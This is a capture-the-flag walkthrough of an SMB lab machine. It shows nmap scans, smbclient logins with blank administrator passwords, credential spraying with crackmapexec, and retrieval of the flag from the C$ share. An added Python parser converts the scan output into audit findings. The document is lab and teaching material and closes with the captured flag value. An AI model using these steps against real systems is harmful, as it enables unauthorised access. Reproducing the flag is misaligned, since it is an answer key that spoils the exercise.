10. TACTICS (SMB)
Protocols, SMB, Reconnaissance, Misconfiguration
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
* Typically '-sV' is used with Nmap to determine service versions, but that is not always enough.
- adding -sC is another good way to determine service versions
- the -sC option runs the "safe" default scripts, which are designed to provide useful
information without being too intrusive or causing harm to the target systems.
* use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
- the -Pn option treats all hosts as online and skips host discovery
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 135,139,445
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-03-04T02:57:55
|_ start_date: N/A
* the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 135,139,445
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
* --script=vuln runs scripts that focus specifically on detecting known
vulnerabilities in the services running on the scanned ports (here 135, 139 and 445)
- e.g., weak configurations, or known vulnerabilities in the SMB service
- if no results are found, the service may be fully patched!
#this tests whether the server has a password misconfiguration (anonymous/null login)
root@htb:~$ smbclient -h
root@htb:~$ smbclient -N -L \\\\{TARGET_IP}\\
* the -N refers to "no password"
* the -L is used to list available shares on the target
root@htb:~$ smbclient -L {targetIP} -U {administrator}
Password for [WORKGROUP\administrator]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.200 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
* the -L flag is used to list available shares on the target.
* the -U flag is used to specify the Login identity to use.
- misconfigured SMB servers typically have "administrator" as the username
with an unset (blank) password
* the $ symbol at the end of the sharename means that it is an administrative share
* ALT: use crackmapexec to test a list of usernames against a blank password
crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p ""
SMB 10.129.95.200 445 TACTICS [*] Windows 10 / Server 2019 Build 17763 x64 (name:TACTICS) (domain:Tactics) (signing:False) (SMBv1:False)
SMB 10.129.95.200 445 TACTICS [-] Tactics\user: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [+] Tactics\administrator: (Pwn3d!)
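To turn the two checks above (Nmap's smb2-security-mode verdict and the crackmapexec banner/login lines) into findings an auditor can act on, here is an added parser; it is not part of the original notes or of either tool, and the sample output, IP and hostname it embeds are constructed to mirror the lines shown above.

```python
import re

# Constructed sample output modelled on the nmap and crackmapexec lines in the
# notes above; the IP and hostname are placeholders, not captured from a live host.
NMAP_SAMPLE = """Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-03-04T02:57:55
|_  start_date: N/A
"""
CME_SAMPLE = r"""SMB  10.0.0.5  445  TACTICS  [*] Windows 10 / Server 2019 Build 17763 x64 (name:TACTICS) (domain:Tactics) (signing:False) (SMBv1:False)
SMB  10.0.0.5  445  TACTICS  [-] Tactics\user: STATUS_LOGON_FAILURE
SMB  10.0.0.5  445  TACTICS  [+] Tactics\administrator: (Pwn3d!)
"""

# SMB <host> <port> <name> [tag] <rest>
CME_LINE = re.compile(r"^SMB\s+(\S+)\s+\d+\s+\S+\s+\[([*+-])\]\s+(.*)$")

def signing_from_nmap(text):
    """Read the smb2-security-mode NSE result: 'not_required', 'required',
    or None when the script produced no verdict."""
    for line in text.splitlines():
        if "Message signing enabled but not required" in line:
            return "not_required"
        if "Message signing enabled and required" in line:
            return "required"
    return None

def findings_from_cme(text, tried_password):
    """Turn crackmapexec SMB output into (host, issue, account) findings.
    [*] lines carry the host banner flags; [+] lines are accounts that
    accepted tried_password; [-] lines (logon failures) are ignored."""
    findings = []
    for line in text.splitlines():
        m = CME_LINE.match(line.strip())
        if not m:
            continue
        host, tag, rest = m.groups()
        if tag == "*" and "(signing:False)" in rest:
            findings.append((host, "smb_signing_not_required", ""))
        if tag == "*" and "(SMBv1:True)" in rest:
            findings.append((host, "smbv1_enabled", ""))
        if tag == "+":
            account = rest.split(":", 1)[0]           # e.g. Tactics\administrator
            issue = "blank_password" if tried_password == "" else "weak_password"
            if "(Pwn3d!)" in rest:                    # crackmapexec: account is a local admin
                issue += "_admin"
            findings.append((host, issue, account))
    return findings
```

Run `findings_from_cme(CME_SAMPLE, "")` to reproduce the page's case: a blank administrator password on a host that does not require signing.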
root@htb:~$ smbclient \\\\10.129.95.200\\ADMIN$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> help
...
root@htb:~$ smbclient \\\\10.129.95.200\\C$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> help
...
smb: \> dir
Users DR 0 Wed Apr 21 10:23:18 2021
smb: \> dir Users\
Administrator D 0 Wed Apr 21 10:23:32 2021
smb: \> dir Users\Administrator\Desktop\
flag.txt A 32 Fri Apr 23 04:39:00 2021
smb: \> get Users\Administrator\Desktop\flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 32 as Users\Administrator\Desktop\flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
root@htb:~$ cat Users\\Administrator\\Desktop\\flag.txt
f751c19eda8f61ce81827e6930a1f40c